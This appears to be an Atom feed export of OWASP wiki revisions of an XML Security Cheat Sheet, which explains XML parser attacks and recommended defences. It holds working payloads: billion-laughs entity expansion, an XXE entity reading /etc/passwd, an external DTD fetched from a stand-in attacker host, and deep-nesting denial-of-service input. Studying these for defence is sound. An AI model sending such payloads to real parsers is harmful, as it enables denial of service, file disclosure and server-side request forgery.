 &amp;lt;!ENTITY LOL9 &amp;quot;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;quot;&amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;TEST&amp;gt;&amp;amp;LOL9;&amp;lt;/TEST&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The entity &amp;lt;tt&amp;gt;LOL9&amp;lt;/tt&amp;gt; expands to 10 references to &amp;lt;tt&amp;gt;LOL8&amp;lt;/tt&amp;gt;; each of these expands to 10 references to &amp;lt;tt&amp;gt;LOL7&amp;lt;/tt&amp;gt;, and so on. Finally, the CPU and/or memory will be affected by expanding the 10^9 (1,000,000,000) copies of &amp;lt;tt&amp;gt;LOL&amp;lt;/tt&amp;gt;, about 3*10^9 (3,000,000,000) characters, which could make the parser crash.&lt;br /&gt;
&lt;br /&gt;
The Simple Object Access Protocol (SOAP) specification forbids DTDs completely. This means that a SOAP processor can reject any SOAP message that contains a DTD. Despite this specification, certain SOAP implementations did parse DTD schemas within SOAP messages. The following example illustrates a case where the parser is not following the specification, enabling a reference to a DTD in a SOAP message:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;UTF-8&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE SOAP-ENV:Envelope [&lt;br /&gt;
  &amp;lt;!ELEMENT SOAP-ENV:Envelope ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ATTLIST SOAP-ENV:Envelope entityReference CDATA #IMPLIED&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL &amp;quot;LOL&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL1 &amp;quot;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL2 &amp;quot;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL3 &amp;quot;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL4 &amp;quot;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL5 &amp;quot;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL6 &amp;quot;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL7 &amp;quot;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL8 &amp;quot;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL9 &amp;quot;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;quot;&amp;gt;&lt;br /&gt;
]&amp;gt; &lt;br /&gt;
&amp;lt;SOAP:Envelope entityReference=&amp;quot;&amp;amp;LOL9;&amp;quot; xmlns:SOAP=&amp;quot;http://schemas.xmlsoap.org/soap/envelope/&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;SOAP:Body&amp;gt;&lt;br /&gt;
    &amp;lt;keyword xmlns=&amp;quot;urn:parasoft:ws:store&amp;quot;&amp;gt;foo&amp;lt;/keyword&amp;gt;&lt;br /&gt;
  &amp;lt;/SOAP:Body&amp;gt;&lt;br /&gt;
&amp;lt;/SOAP:Envelope&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
;Recommendation&lt;br /&gt;
RFC 2376 states that &amp;quot;Recursive expansions are prohibited [REC-XML] and XML processors are required to detect them&amp;quot;. To detect this type of behavior automatically, you must limit the number of expansions to be made, or disable the use of inline DTD schemas altogether in your XML parsing objects.  SOAP messages should be inherently safe from this vulnerability because “a SOAP message MUST NOT contain a document type declaration,”  but when this type of vulnerability was detected, certain implementations did not comply with this rule. &lt;br /&gt;
&lt;br /&gt;
=== Reflected File Retrieval ===&lt;br /&gt;
Consider the following example code of an XXE:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;ISO-8859-1&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE includeme [&lt;br /&gt;
  &amp;lt;!ELEMENT includeme ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY xxe SYSTEM &amp;quot;/etc/passwd&amp;quot;&amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;includeme&amp;gt;&amp;amp;xxe;&amp;lt;/includeme&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous XML defines an entity named &amp;lt;tt&amp;gt;xxe&amp;lt;/tt&amp;gt; whose replacement text is the contents of &amp;lt;tt&amp;gt;/etc/passwd&amp;lt;/tt&amp;gt;; the entity will be expanded within the &amp;lt;tt&amp;gt;includeme&amp;lt;/tt&amp;gt; tag. If the parser allows references to external entities, it might include the contents of that file in the XML response or in the error output.&lt;br /&gt;
&lt;br /&gt;
;Recommendation&lt;br /&gt;
To avoid a file retrieval attack, avoid using DTD and validate the content of XML documents according to the expected values of a local XML schema.&lt;br /&gt;
&lt;br /&gt;
=== Server Side Request Forgery ===&lt;br /&gt;
Server Side Request Forgery (SSRF) happens when the server receives a malicious XML schema that makes the server retrieve remote resources, such as a file via HTTP, HTTPS, or FTP. SSRF has been used to retrieve remote files, to prove an XXE when the file cannot be reflected back, to perform port scanning, or to perform brute force attacks on internal networks.&lt;br /&gt;
&lt;br /&gt;
==== External File Retrieval ====&lt;br /&gt;
Whenever there is an XXE and you cannot retrieve a file, you can test if you would be able to establish remote connections:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;UTF-8&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE root [ &lt;br /&gt;
  &amp;lt;!ENTITY % xxe SYSTEM &amp;quot;http://attacker/evil.dtd&amp;quot;&amp;gt;&lt;br /&gt;
  %xxe;&lt;br /&gt;
]&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Port Scanning ====&lt;br /&gt;
The amount and type of information will depend on the type of implementation. Responses can be classified as follows, ranking from easy to complex:&lt;br /&gt;
&lt;br /&gt;
''' Complete Disclosure '''&lt;br /&gt;
This is the simplest and most unusual scenario: with complete disclosure, you can clearly see what’s going on by receiving the complete responses from the server being queried. You have an exact representation of what happened when connecting to the remote host.&lt;br /&gt;
&lt;br /&gt;
''' Error-based '''&lt;br /&gt;
If you are unable to see the response from the remote server, you may be able to use the error response. Consider a web service leaking details on what went wrong in the SOAP Fault element when trying to establish a connection: &lt;br /&gt;
 &amp;lt;pre&amp;gt;java.io.IOException: Server returned HTTP response code: 401 for URL: http://192.168.1.1:80&lt;br /&gt;
	at sun.net.www.protocol.http.HttpURLConnection.getInputStream(HttpURLConnection.java:1459)&lt;br /&gt;
	at com.sun.org.apache.xerces.internal.impl.XMLEntityManager.setupCurrentEntity(XMLEntityManager.java:674)&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
''' Timeout-based '''&lt;br /&gt;
Timeouts could occur when connecting to open or closed ports, depending on the schema and the underlying implementation. If the timeouts occur while you are trying to connect to a closed port (which may take one minute), the response time when connecting to an open port will be very quick (one second, for example). The difference between open and closed ports becomes quite clear.&lt;br /&gt;
&lt;br /&gt;
''' Time-based '''&lt;br /&gt;
Sometimes differences between closed and open ports are very subtle. The only way to know the status of a port with certainty would be to take multiple measurements of the time required to reach each host, then analyze the average time for each port to determine its status. This type of attack will be difficult to accomplish when performed in higher latency networks.&lt;br /&gt;
&lt;br /&gt;
==== Brute Forcing ====&lt;br /&gt;
Once an attacker confirms that it is possible to perform a port scan, performing a brute force attack is a matter of embedding the &amp;lt;tt&amp;gt;username&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;password&amp;lt;/tt&amp;gt; as part of the URI. For example:&lt;br /&gt;
 &amp;lt;pre&amp;gt;foo://username:password@example.com:8080/&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
;Recommendation&lt;br /&gt;
To avoid this attack, do not use DTD.&lt;br /&gt;
&lt;br /&gt;
=Authors and Primary Editors=&lt;br /&gt;
&lt;br /&gt;
[mailto:fernando.arnaboldi@ioactive.com Fernando Arnaboldi]&lt;/div&gt;</summary>
		<author><name>Fernando.arnaboldi</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=XML_Security_Cheat_Sheet&amp;diff=224414</id>
		<title>XML Security Cheat Sheet</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=XML_Security_Cheat_Sheet&amp;diff=224414"/>
				<updated>2016-12-21T18:42:48Z</updated>
		
		<summary type="html">&lt;p&gt;Fernando.arnaboldi: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Introduction ==&lt;br /&gt;
&lt;br /&gt;
Specifications for XML and XML schemas include multiple security flaws. At the same time, these specifications provide the tools required to protect XML applications. Even though we use XML schemas to define the security of XML documents, they can be used to perform a variety of attacks: file retrieval, server side request forgery, port scanning, or brute forcing. This cheat sheet exposes how to exploit the different possibilities in libraries and software. &lt;br /&gt;
&lt;br /&gt;
= Malformed XML Documents =&lt;br /&gt;
The W3C XML specification defines a set of principles that XML documents must follow to be considered well formed. When a document violates any of these principles, it must be considered a fatal error and the data it contains is considered malformed. Multiple tactics will cause a malformed document: removing an ending tag, rearranging the order of elements into a nonsensical structure, introducing forbidden characters, and so on. The XML parser should stop execution as soon as it detects a fatal error. The document should not undergo any additional processing, and the application should display an error message.&lt;br /&gt;
&lt;br /&gt;
== More Time Required ==&lt;br /&gt;
A malformed document may affect the consumption of Central Processing Unit (CPU) resources. In certain scenarios, the amount of time required to process malformed documents may be greater than that required for well-formed documents. When this happens, an attacker may exploit an asymmetric resource consumption attack to take advantage of the greater processing time to cause a Denial of Service (DoS). &lt;br /&gt;
&lt;br /&gt;
To assess the likelihood of this attack, compare the time taken to process a regular XML document with the time taken to process a malformed version of that same document. Then, consider how an attacker could use this vulnerability in conjunction with an XML flood attack using multiple documents to amplify the effect.&lt;br /&gt;
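&lt;br /&gt;
One way to take this measurement is sketched below using Python's standard &amp;lt;tt&amp;gt;xml.parsers.expat&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;timeit&amp;lt;/tt&amp;gt; modules. The helper names and the repetition count are assumptions made for illustration; substitute the parser your application actually uses, since results for one parser say nothing about another.&lt;br /&gt;

```python
import timeit
import xml.parsers.expat


def parse_once(document: bytes) -> bool:
    """Parse one document with a fresh expat parser; return False on a fatal error."""
    parser = xml.parsers.expat.ParserCreate()
    try:
        parser.Parse(document, True)
    except xml.parsers.expat.ExpatError:
        return False
    return True


def average_parse_time(document: bytes, repetitions: int = 1000) -> float:
    """Average wall-clock seconds spent per parse attempt."""
    total = timeit.timeit(lambda: parse_once(document), number=repetitions)
    return total / repetitions


def slowdown_ratio(regular: bytes, malformed: bytes, repetitions: int = 1000) -> float:
    """A ratio above 1.0 means the malformed variant took longer on this run."""
    slow = average_parse_time(malformed, repetitions)
    fast = average_parse_time(regular, repetitions)
    return slow / fast
```

A ratio that stays well above 1.0 across repeated runs suggests that malformed input costs the parser more than well-formed input and deserves a closer look.&lt;br /&gt;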
&lt;br /&gt;
;Recommendation&lt;br /&gt;
To avoid this attack, you must confirm that your version of the XML processor does not take significant additional time to process malformed documents.&lt;br /&gt;
&lt;br /&gt;
== Applications Processing Malformed Data ==&lt;br /&gt;
Certain XML parsers have the ability to recover malformed documents. They can be instructed to try their best to return a valid tree with all the content that they can manage to parse, regardless of the document’s noncompliance with the specifications. Since there are no predefined rules for the recovery process, the approach and results may not always be the same. Using malformed documents might lead to unexpected issues related to data integrity.&lt;br /&gt;
&lt;br /&gt;
The following two scenarios illustrate attack vectors a parser will analyze in recovery mode:&lt;br /&gt;
&lt;br /&gt;
=== Malformed Document to Malformed Document ===&lt;br /&gt;
According to the XML specification, the string &amp;lt;tt&amp;gt;--&amp;lt;/tt&amp;gt; (double-hyphen) must not occur within comments. Using the recovery mode of lxml and PHP, the following document will remain the same after being recovered:&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;element&amp;gt;&lt;br /&gt;
  &amp;lt;!-- one&lt;br /&gt;
    &amp;lt;!-- another comment&lt;br /&gt;
  comment --&amp;gt;&lt;br /&gt;
&amp;lt;/element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Well-Formed Document to Well-Formed Document Normalized ===&lt;br /&gt;
Certain parsers may consider normalizing the contents of your &amp;lt;tt&amp;gt;CDATA&amp;lt;/tt&amp;gt; sections. This means that they will update the special characters contained in the &amp;lt;tt&amp;gt;CDATA&amp;lt;/tt&amp;gt; section to contain the safe versions of these characters even though it is not required: &lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;element&amp;gt;&lt;br /&gt;
  &amp;lt;![CDATA[&amp;lt;script&amp;gt;a=1;&amp;lt;/script&amp;gt;]]&amp;gt;&lt;br /&gt;
&amp;lt;/element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Normalization of a &amp;lt;tt&amp;gt;CDATA&amp;lt;/tt&amp;gt; section is not a common rule among parsers. Libxml could transform this document to its canonical version, but although well formed, its contents may be considered malformed depending on the situation:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;element&amp;gt;&lt;br /&gt;
  &amp;amp;amp;lt;script&amp;amp;amp;gt;a=1;&amp;amp;amp;lt;/script&amp;amp;amp;gt; &lt;br /&gt;
&amp;lt;/element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
;Recommendation&lt;br /&gt;
If it is not possible to process only well-formed documents, take into consideration that the final results could be unreliable. To avoid this attack completely, you must not recover or process malformed documents.&lt;br /&gt;
&lt;br /&gt;
== Coercive Parsing ==&lt;br /&gt;
A coercive attack in XML involves parsing deeply nested XML documents without their corresponding ending tags. The idea is to make the victim use up, and eventually deplete, the machine’s resources and cause a denial of service on the target.&lt;br /&gt;
Reports of a DoS attack in Firefox 3.67 included the use of 30,000 open XML elements without their corresponding ending tags. Removing the closing tags simplified the attack since it requires only half of the size of a well-formed document to accomplish the same results. The number of tags being processed eventually caused a stack overflow. A simplified version of such a document would look like this: &lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;A1&amp;gt;&lt;br /&gt;
  &amp;lt;A2&amp;gt; &lt;br /&gt;
   &amp;lt;A3&amp;gt;&lt;br /&gt;
     ...&lt;br /&gt;
      &amp;lt;A30000&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
;Recommendation&lt;br /&gt;
To avoid this attack you must define a maximum number of items (elements, attributes, entities, etc.) to be processed by the parser. An XML schema could also be used to validate the document structure before being parsed.&lt;br /&gt;
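&lt;br /&gt;
Where the parser itself offers no such limits, they can be approximated in handler code. The following sketch uses Python's standard &amp;lt;tt&amp;gt;xml.parsers.expat&amp;lt;/tt&amp;gt; module; the function name, the exception class, and the default limits are hypothetical values chosen for illustration and should be tuned to the documents you expect.&lt;br /&gt;

```python
import xml.parsers.expat


class LimitExceeded(Exception):
    """Raised when a document goes beyond the configured limits."""


def parse_with_limits(data: bytes, max_depth: int = 64, max_elements: int = 10000) -> int:
    """Parse data, aborting as soon as nesting depth or element count is too high.

    Returns the number of elements seen. Malformed input still raises
    xml.parsers.expat.ExpatError.
    """
    parser = xml.parsers.expat.ParserCreate()
    state = {"depth": 0, "elements": 0}

    def start_element(name, attributes):
        state["depth"] += 1
        state["elements"] += 1
        if state["depth"] > max_depth:
            raise LimitExceeded(f"nesting deeper than {max_depth}")
        if state["elements"] > max_elements:
            raise LimitExceeded(f"more than {max_elements} elements")

    def end_element(name):
        state["depth"] -= 1

    parser.StartElementHandler = start_element
    parser.EndElementHandler = end_element
    parser.Parse(data, True)
    return state["elements"]
```

Because the check runs as each start tag is read, processing stops at the first element beyond the limit instead of after the whole document has been consumed.&lt;br /&gt;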
&lt;br /&gt;
== Violation of XML Specification Rules ==&lt;br /&gt;
Unexpected consequences may result from manipulating documents using parsers that do not follow W3C specifications. It may be possible to achieve crashes and/or code execution when the software does not properly verify how to handle incorrect XML structures. Feeding the software with fuzzed XML documents may expose this behavior. &lt;br /&gt;
&lt;br /&gt;
;Recommendation&lt;br /&gt;
To avoid this attack you must use an XML processor that follows W3C specifications. In addition, validate the contents of each element and attribute to process only valid values within predefined boundaries.&lt;br /&gt;
&lt;br /&gt;
= Invalid XML Documents =&lt;br /&gt;
Attackers may introduce unexpected values in documents to take advantage of an application that does not verify whether the document contains a valid set of values. Schemas specify restrictions that help identify whether documents are valid. A valid document is well formed and complies with the restrictions of a schema, and more than one schema can be used to validate a document. These restrictions may appear in multiple files, either using a single schema language or relying on the strengths of the different schema languages.&lt;br /&gt;
&lt;br /&gt;
== Document without Schema ==&lt;br /&gt;
Consider a bookseller that uses a web service through a web interface to make transactions. The XML document for transactions is composed of two elements: an &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; value related to an item and a certain &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt;. The user may only introduce a certain &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; value using the web interface:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;buy&amp;gt;&lt;br /&gt;
  &amp;lt;id&amp;gt;123&amp;lt;/id&amp;gt;&lt;br /&gt;
  &amp;lt;price&amp;gt;10&amp;lt;/price&amp;gt;&lt;br /&gt;
&amp;lt;/buy&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
If there is no control on the document’s structure, the application could also process different well-formed messages with unintended consequences. The previous document could have contained additional tags to affect the behavior of the underlying application processing its contents:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;buy&amp;gt;&lt;br /&gt;
  &amp;lt;id&amp;gt;123&amp;lt;/id&amp;gt;&amp;lt;price&amp;gt;0&amp;lt;/price&amp;gt;&amp;lt;id&amp;gt;&amp;lt;/id&amp;gt;&lt;br /&gt;
  &amp;lt;price&amp;gt;10&amp;lt;/price&amp;gt;&lt;br /&gt;
&amp;lt;/buy&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Notice again how the value 123 is supplied as an &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt;, but now the document includes additional opening and closing tags. The attacker closes the &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; element and sets a bogus &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt; element to the value 0. The final step to keep the structure well-formed is to add one empty &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; element. After this, the application adds the closing tag for &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; and sets the &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt; to 10. If the application processes only the first values provided for the &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; and the &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt; without performing any type of control on the structure, it could benefit the attacker by providing the ability to buy a book without actually paying for it. &lt;br /&gt;
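&lt;br /&gt;
The difference between reading the first value and insisting on exactly one value can be sketched with Python's standard &amp;lt;tt&amp;gt;xml.etree.ElementTree&amp;lt;/tt&amp;gt; module. Both function names are hypothetical, and the structural check shown here is only a stand-in for proper schema validation.&lt;br /&gt;

```python
import xml.etree.ElementTree as ET


def first_value(xml_text: str, tag: str):
    """Naive lookup: return the text of the first matching child element."""
    return ET.fromstring(xml_text).findtext(tag)


def single_value(xml_text: str, tag: str):
    """Stricter lookup: require exactly one matching child element."""
    matches = ET.fromstring(xml_text).findall(tag)
    if len(matches) != 1:
        raise ValueError(f"expected one {tag} element, found {len(matches)}")
    return matches[0].text
```

Applied to the tampered document above, the naive lookup would return the attacker's price of 0, while the stricter lookup rejects the message because two &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt; elements are present.&lt;br /&gt;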
&lt;br /&gt;
; Recommendation&lt;br /&gt;
Each XML document must have a precisely defined XML schema with every piece of information properly restricted to avoid problems of improper data validation. &lt;br /&gt;
&lt;br /&gt;
== Unrestrictive Schema ==&lt;br /&gt;
Certain schemas do not offer enough restrictions for the type of data that each element can receive. This is what normally happens when using DTD; it has a very limited set of possibilities compared to the type of restrictions that can be applied in XML documents. This could expose the application to undesired values within elements or attributes that would be easy to constrain when using other schema languages. In the following example, a person’s &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt; is validated against an inline DTD schema:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;!DOCTYPE person [&lt;br /&gt;
  &amp;lt;!ELEMENT person (name, age)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT name (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT age (#PCDATA)&amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;person&amp;gt;&lt;br /&gt;
  &amp;lt;name&amp;gt;John Doe&amp;lt;/name&amp;gt;&lt;br /&gt;
  &amp;lt;age&amp;gt;11111..(1.000.000digits)..11111&amp;lt;/age&amp;gt;&lt;br /&gt;
&amp;lt;/person&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous document contains an inline DTD with a root element named &amp;lt;tt&amp;gt;person&amp;lt;/tt&amp;gt;. This element contains two elements in a specific order: &amp;lt;tt&amp;gt;name&amp;lt;/tt&amp;gt; and then &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt;. The elements &amp;lt;tt&amp;gt;name&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt; are then each defined to contain &amp;lt;tt&amp;gt;PCDATA&amp;lt;/tt&amp;gt;. The well-formed and valid XML document begins after this definition. The element &amp;lt;tt&amp;gt;name&amp;lt;/tt&amp;gt; contains an irrelevant value but the &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt; element contains one million digits. Since there are no restrictions on the maximum size for the &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt; element, this one-million-digit string could be sent to the server for this element. Typically this type of element should be restricted to contain no more than a certain number of characters and constrained to a certain set of characters (for example, digits from 0 to 9, the + sign and the - sign).&lt;br /&gt;
If not properly restricted, applications may handle potentially invalid values contained in documents. Since it is not possible to indicate specific restrictions (a maximum length for the element &amp;lt;tt&amp;gt;name&amp;lt;/tt&amp;gt; or a valid range for the element &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt;), this type of schema increases the risk of affecting the integrity and availability of resources.&lt;br /&gt;
&lt;br /&gt;
;Recommendation&lt;br /&gt;
Use a schema language capable of properly restricting information.&lt;br /&gt;
&lt;br /&gt;
== Improper Data Validation == &lt;br /&gt;
When schemas are insecurely defined and do not provide strict rules, they may expose the application to a variety of problems. The result could be the disclosure of internal errors or documents that hit the application’s functionality with unexpected values.&lt;br /&gt;
&lt;br /&gt;
=== String Data Types ===&lt;br /&gt;
If you need to use a hexadecimal value, there is no point in defining this value as a string that will later be restricted to the 16 hexadecimal characters. As an example of this scenario, when using XML encryption some values must be encoded using base64. This is the schema definition of how these values should look:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;element name='CipherData' type='xenc:CipherDataType'/&amp;gt;&lt;br /&gt;
&amp;lt;complexType name='CipherDataType'&amp;gt;&lt;br /&gt;
  &amp;lt;choice&amp;gt;&lt;br /&gt;
    &amp;lt;element name='CipherValue' type='base64Binary'/&amp;gt;&lt;br /&gt;
    &amp;lt;element ref='xenc:CipherReference'/&amp;gt;&lt;br /&gt;
  &amp;lt;/choice&amp;gt;&lt;br /&gt;
&amp;lt;/complexType&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
The previous schema defines the element &amp;lt;tt&amp;gt;CipherValue&amp;lt;/tt&amp;gt; as a base64 data type. As an example, the IBM WebSphere DataPower SOA Appliance allowed any type of characters within this element after a valid base64 value, and considered the result valid. The first portion of this data was properly checked as a base64 value, but the remaining characters could be anything else (including other sub-elements of the &amp;lt;tt&amp;gt;CipherData&amp;lt;/tt&amp;gt; element). Restrictions were only partially enforced for the element, which suggests that the information was probably tested by application code instead of being validated against the proposed sample schema. &lt;br /&gt;
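&lt;br /&gt;
If the value does have to be checked in application code, the check should cover the whole string and not just a valid prefix. A minimal sketch using Python's standard &amp;lt;tt&amp;gt;base64&amp;lt;/tt&amp;gt; module follows; the function name is hypothetical, and removing whitespace first is an assumption based on the whitespace tolerance of the &amp;lt;tt&amp;gt;base64Binary&amp;lt;/tt&amp;gt; type.&lt;br /&gt;

```python
import base64
import binascii


def decode_cipher_value(text: str) -> bytes:
    """Decode the text of a CipherValue element, rejecting any non-base64 character."""
    compact = "".join(text.split())  # drop whitespace before the strict check
    try:
        return base64.b64decode(compact, validate=True)
    except binascii.Error as exc:
        raise ValueError("CipherValue is not strictly base64") from exc
```

With &amp;lt;tt&amp;gt;validate=True&amp;lt;/tt&amp;gt;, characters outside the base64 alphabet cause an error instead of being silently discarded, so trailing content after a valid value is rejected.&lt;br /&gt;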
&lt;br /&gt;
=== Numeric Data Types ===&lt;br /&gt;
Defining the correct data type for numbers could be a little bit more complex, since there are more options than there are for strings. You could start this process by asking some initial questions:&lt;br /&gt;
* Can the value be a real number?&lt;br /&gt;
* What is the number range? &lt;br /&gt;
* Is precise calculation required?&lt;br /&gt;
The next sample scenarios will analyze different attacks involving numeric data types.&lt;br /&gt;
&lt;br /&gt;
==== Negative and Positive Restrictions ====&lt;br /&gt;
XML Schema numeric data types can include different ranges of numbers. They could include:&lt;br /&gt;
* Negative and positive numbers&lt;br /&gt;
* Only negative numbers&lt;br /&gt;
* Negative numbers and the zero value&lt;br /&gt;
* Only positive numbers&lt;br /&gt;
* Positive numbers and the zero value&lt;br /&gt;
The following sample document defines an &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; for a product, a &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt;, and a &amp;lt;tt&amp;gt;quantity&amp;lt;/tt&amp;gt; value that is under the control of an attacker:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;buy&amp;gt;&lt;br /&gt;
  &amp;lt;id&amp;gt;1&amp;lt;/id&amp;gt;&lt;br /&gt;
  &amp;lt;price&amp;gt;10&amp;lt;/price&amp;gt;&lt;br /&gt;
  &amp;lt;quantity&amp;gt;1&amp;lt;/quantity&amp;gt;&lt;br /&gt;
&amp;lt;/buy&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
To avoid repeating old errors, an XML schema may be defined to prevent processing the incorrect structure in cases where an attacker wants to introduce additional elements:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;xs:schema xmlns:xs=&amp;quot;http://www.w3.org/2001/XMLSchema&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:element name=&amp;quot;buy&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
      &amp;lt;xs:sequence&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;id&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;price&amp;quot; type=&amp;quot;xs:decimal&amp;quot;/&amp;gt;&lt;br /&gt;
